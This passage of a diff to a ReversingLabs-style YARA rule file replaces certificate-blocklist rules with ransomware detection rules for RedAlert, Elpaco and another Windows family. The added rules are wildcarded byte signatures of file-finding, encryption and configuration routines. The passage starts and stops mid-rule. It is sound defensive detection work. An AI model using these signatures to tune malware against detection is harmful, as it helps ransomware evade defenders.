+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
+            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 51 FF B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 51
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 69 0F ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 03 48 ?? 8D 85 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 85 C0 74 ?? BA
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$encryption_loop_1_3 = {
+            69 37 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 70 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 78 ?? 8D
+            4A ?? 89 08 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ??
+            B9 ?? ?? ?? ?? F3 A5 66 A5 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
+            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            C6 45 ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B BD ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? FF 07 8B 07 89 41 ?? 69 17 ?? ?? ?? ?? 8B 41 ?? 80 A4 02
+            ?? ?? ?? ?? ?? 8B 01 48 39 07 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8A 11 8B
+            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and ( pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" or pe.signatures [ i ] . serial == "b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" ) and 1597276800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $remote_server_connection_1_0 and $remote_server_connection_1_1 and ( all of ( $encryption_loop_1_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Redalert : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RedAlert ransomware."
 		author = "ReversingLabs"
-		id = "b285a407-7f71-5c7e-baae-bfa111a50101"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ec7567bf-2c39-529f-ae93-74270a161827"
+		date = "2022-09-01"
+		modified = "2022-09-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5064-L5080"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7bb093287dd309ce12859eca9a9fc98095b3d52ec860626fe6e743bace262fde"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Linux.Ransomware.RedAlert.yara#L1-L146"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fe0d10c2ef1dacdb5374f319e470274b91f4f171db49de8c89e8aaa9aa75a45c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RedAlert"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" and 1597363200 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_13794371C052Ec0559E9B492Abb25C26 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "31f119a3-e0da-5875-826f-68c40c6f8b88"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5082-L5098"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7383d1fb1fa6e49f8fa9e1eecfe3fcedb8a11702fbd3700630a11b12da29fedf"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            41 57 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 74 24 ?? BE ?? ?? ?? ?? 48
+            89 54 24 ?? 48 89 4C 24 ?? 4C 89 44 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 75 ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 89 C7 E8 ?? ?? ?? ?? 83 F8 ?? 89 C3 75 ?? BF ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 48 8D 54 24 ??
+            89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? FF C0 75 ?? BF ?? ?? ?? ?? EB ?? 4C 8B B4 24 ??
+            ?? ?? ?? 4D 85 F6 7F ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? EB ?? 49
+            81 FE ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F 97 44 24 ?? 49 81 FE ?? ?? ?? ?? 0F 97
+            44 24 ?? 80 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 4C 89 F0 C7 44 24 ?? ?? ?? ?? ?? 48 89
+            D3 31 D2 48 F7 F3 48 6B C8 ?? 48 89 4C 24 ?? 49 81 FE ?? ?? ?? ?? 77 ?? 4D 89 F4 41
+            BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 41 BC ?? ?? ?? ?? 45 31 ED C7 44 24 ??
+            ?? ?? ?? ?? 4D 63 FD C7 44 24 ?? ?? ?? ?? ?? 4C 0F AF 7C 24 ?? E9 ?? ?? ?? ?? 80 7C
+            24 ?? ?? 74 ?? 45 85 ED 74 ?? 80 7C 24 ?? ?? 74 ?? 41 8D 45 ?? 3B 44 24 ?? 4C 89 FE
+            75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48 63 7C 24 ??
+            48 89 E9 4C 89 E2 48 03 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 39 E0 74 ?? BF ??
+            ?? ?? ?? EB ?? 44 01 64 24 ?? 41 FF C5 44 3B 6C 24 ?? 0F 85 ?? ?? ?? ?? 48 8D 9C 24
+            ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84 C0 74 ?? BF ??
+            ?? ?? ?? EB ?? 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 85 C0
+            74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 63 6C 24 ?? 45 89 E7 44 89 64 24 ?? 4C 0F AF
+            6C 24 ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B 4C 24 ?? 41 B8
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 84
+        }
+		$encrypt_files_p2 = {
+            C0 75 ?? 48 8B 54 24 ?? 48 8B 7C 24 ?? 48 89 E9 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7
+            15 ?? ?? ?? ?? 48 39 D0 75 ?? 48 8B 44 24 ?? 48 89 E9 BE ?? ?? ?? ?? 0F B7 50 ?? 48
+            8B 38 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F B7 51 ?? 48 39 D0 74 ?? BF ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 03 7C 24 ?? 44 3B 6C 24 ?? 0F 8C ?? ?? ?? ?? E9
+            ?? ?? ?? ?? BF ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 7C
+            24 ?? ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 80 7C 24 ?? ?? 74 ?? 8B 44 24 ?? 4C 89 EE FF C0
+            3B 44 24 ?? 75 ?? 49 8D B6 ?? ?? ?? ?? EB ?? 31 F6 31 D2 48 89 EF E8 ?? ?? ?? ?? 48
+            63 44 24 ?? 48 8B 5C 24 ?? 48 8D B4 24 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C9 31
+            D2 45 89 E1 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 01 C3 48 8D 84 24 ??
+            ?? ?? ?? 49 89 D8 48 89 1C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            48 89 E9 4C 89 E2 BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 39 E0 0F 85 ?? ?? ?? ??
+            FF 44 24 ?? 8B 54 24 ?? 8B 4C 24 ?? 01 54 24 ?? 39 4C 24 ?? 75 ?? 31 F6 BA ?? ?? ??
+            ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 E9 BA ?? ?? ?? ?? BE ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8A 5C 24 ?? 48 83 F8 ?? B0 ?? 0F 44 D8 44 3B 7C 24 ?? 88 5C 24
+            ?? 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 44 03 7C 24 ?? 4C 03 6C 24 ?? 8B 44 24 ?? 39
+            44 24 ?? 0F 8C ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 0F B6 44 24 ?? 48 81 C4 ?? ?? ??
+            ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+		$find_files_p1 = {
+            41 57 FC 41 56 41 55 41 54 49 89 FC 55 53 48 83 EC ?? 48 8B 84 24 ?? ?? ?? ?? 48 89
+            4C 24 ?? 48 83 C9 ?? 48 89 74 24 ?? 4C 89 44 24 ?? 4C 89 4C 24 ?? 88 54 24 ?? 48 89
+            44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 44 8A BC 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 31 C0 F2 AE 4C 89
+            E7 48 F7 D1 4C 8D 71 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 44 24 ?? 0F 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 83 C4 ?? 4C 89 E6 48 89 C2 5B 5D 41 5C 41 5D 41
+            5E 41 5F BF ?? ?? ?? ?? 31 C0 E9 ?? ?? ?? ?? 45 84 FF 48 8D 6B ?? 74 ?? 0F B6 4B ??
+            48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ??
+            80 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84
+            ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FC 31 C0 48 83 C9 ?? 48 89 EF
+            F2 AE 4C 89 F0 48 29 C8 48 3B 44 24 ?? 76 ?? 48 8B 3D ?? ?? ?? ?? 48 89 E9 4C 89 E2
+            BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EE 48 8D 7B ??
+            C6 03 ?? E8 ?? ?? ?? ?? 41 0F B6 C7 4C 8B 4C 24 ?? 4C 8B 44 24 ?? 89 44 24 ?? 48 8B
+            44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 74 24 ?? 4C 89 E7 48 89 44 24 ?? 48 8B
+        }
+		$find_files_p2 = {
+            44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 89 04 24 E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 84 FF 0F 85 ?? ?? ?? ?? FC 48 83 C9 ?? 48 89 EF 44 88
+            F8 F2 AE 48 8B 54 24 ?? 48 89 EF 48 89 CB 48 8B 4C 24 ?? 48 F7 D3 48 89 DE 4C 8D 6B
+            ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 89 EA 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 4B 8D 1C 34 48 89 EA 4C
+            89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8D 7B ?? 48 89 EE C6 03 ?? E8 ?? ?? ??
+            ?? 0F B7 0D ?? ?? ?? ?? 4C 89 E7 4C 8B 44 24 ?? 48 8B 54 24 ?? 48 8B 74 24 ?? FF 15
+            ?? ?? ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? 48 8B 7C 24 ?? B9 ?? ?? ?? ?? 4C 89 E2 BE ??
+            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 8B 74 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 8D 56 ??
+            4C 89 E6 E8 ?? ?? ?? ?? C6 03 ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 85 C0 48 89 C3 0F
+            85 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F E9
+        }
+		$setup_environment = {
+            55 48 89 E5 41 56 49 89 F6 BE ?? ?? ?? ?? 41 55 41 54 53 48 89 FB 48 83 EC ?? E8 ??
+            ?? ?? ?? 48 85 C0 49 89 C4 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 7D ?? E8 ?? ??
+            ?? ?? 84 C0 BF ?? ?? ?? ?? 74 ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 85 C0 49
+            89 C4 74 ?? 0F B7 55 ?? 48 8B 7D ?? 48 89 C1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55
+            ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 55 ?? 31 C9 39 C2 0F 85
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ??
+            ?? 49 89 E5 E8 ?? ?? ?? ?? 66 8B 3D ?? ?? 22 00 66 03 3D ?? ?? 22 00 66 8B 05 ?? ??
+            22 00 66 89 7D ?? 0F B7 FF 66 89 45 ?? E8 ?? ?? ?? ?? 0F B7 7D ?? 48 89 45 ?? E8 ??
+            ?? ?? ?? 0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? 48 89 45 ?? E8 ?? ?? ?? ??
+            0F B7 55 ?? 48 8B 7D ?? 4C 89 E1 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? BF ?? ??
+            ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 45 ?? 0F B7 35 ?? ?? ?? ?? 31 C9 48 8B 7D ?? 48 83
+            C0 ?? 25 ?? ?? ?? ?? 48 29 C4 48 8D 5C 24 ?? 48 83 E3 ?? 48 89 DA E8 ?? ?? ?? ?? 48
+            89 DE BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 0F B7 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 48 03
+            7D ?? E8 ?? ?? ?? ?? 66 39 05 ?? ?? 22 00 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89
+            EC 31 C9 EB ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D 75 ?? B9 ?? ?? ?? ?? 4C 89 F7 FC F3 A5
+            B1 ?? EB ?? 4C 89 EC EB ?? 48 8D 65 ?? 89 C8 5B 41 5C 41 5D 41 5E C9 C3
+        }
+		$make_configuration = {
+            41 56 BE ?? ?? ?? ?? 49 89 FE BF ?? ?? ?? ?? 41 55 41 54 55 53 48 83 EC ?? E8 ?? ??
+            ?? ?? 84 C0 88 C3 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 31 FF EB ?? BF ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 0F B7 F0 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 49 89 C4 48 89 C2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? 66 C7 00
+            ?? ?? C6 40 ?? ?? E8 ?? ?? ?? ?? 4C 89 E6 BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
+            E6 4C 89 E7 E8 ?? ?? ?? ?? 84 C0 75 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ??
+            E8 ?? ?? ?? ?? FC 88 D8 BF ?? ?? ?? ?? 48 83 C9 ?? F2 AE 48 F7 D1 48 FF C9 8D 59 ??
+            83 C1 ?? 48 63 F9 E8 ?? ?? ?? ?? 48 85 C0 48 89 C5 0F 84 ?? ?? ?? ?? 48 8D 78 ?? 48
+            63 D3 BE ?? ?? ?? ?? C6 00 ?? E8 ?? ?? ?? ?? 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 85 C0 48 89 C3 BF ?? ?? ?? ?? 74 ?? 0F B7 54 24 ?? 48 8B 7C 24 ?? 48 89 C1 BE ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 F7 48 89 E6 B9 ?? ?? ?? ?? FC F3 A5
+            48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E C3 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" and 1599177600 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $setup_environment ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $make_configuration )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Elpaco : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Elpaco ransomware."
 		author = "ReversingLabs"
-		id = "5906107a-03ce-5ca4-b0a7-12b0b45359dd"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "eb3a6293-f10c-55c4-960a-339e1e7922fe"
+		date = "2025-02-27"
+		modified = "2025-02-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5100-L5116"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7521abc5c93f0336af4fab95268962aa3d3fb48fed6a8ba7fdb98e373158b327"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Elpaco.yara#L1-L316"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6b3fdd586c9f3e5c40782c814b5091b28e88f3d74032c392a6479182eb74327a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Elpaco"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" and 1579824000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Dadf44E4046372313Ee97B8E394C4079 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "bebfbbd7-8d42-50a3-8efa-85b641eb069a"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5118-L5136"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "170533935b91776ec2413106c55ed4a01c33f32a469a855824cac796f2e132a0"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 8D ?? ??
+            ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 6A ?? 66 0F 13 45 ?? 6A ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 6A
+            ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ??
+            ?? ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 7E ?? 8D 85 ?? ?? ?? ?? 50 57 56 E8 ?? ?? ?? ?? 8B 55 ??
+            B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 5D ?? 83 C2 ?? 89 46 ?? 89 55 ??
+            89 07 0F 84 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B F2 8B 03 8D 4D ?? 8B 40 ?? 50 89 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? B8 ?? ?? ?? ?? 47 C6 45 ?? ?? F7 E7 8B
+            CF 89 BD ?? ?? ?? ?? C1 EA ?? 6B C2 ?? 2B C8 75 ?? 57 39 8D ?? ?? ?? ?? 75 ?? 68 ??
+            ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ??
+            8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8B BD ?? ?? ?? ?? 0F 43 4D ?? 50 51 68
+            ?? ?? ?? ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 BF ?? ?? ?? ?? ?? 75 ?? 83
+        }
+		$find_files_p2 = {
+            7D ?? ?? 8D 4D ?? 0F 43 4D ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 8D ?? ?? ??
+            ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ??
+            ?? ?? ?? 8B BD ?? ?? ?? ?? 85 FF 74 ?? 8B 4F ?? 83 F9 ?? 72 ?? 8B 07 8D 0C 4D ?? ??
+            ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
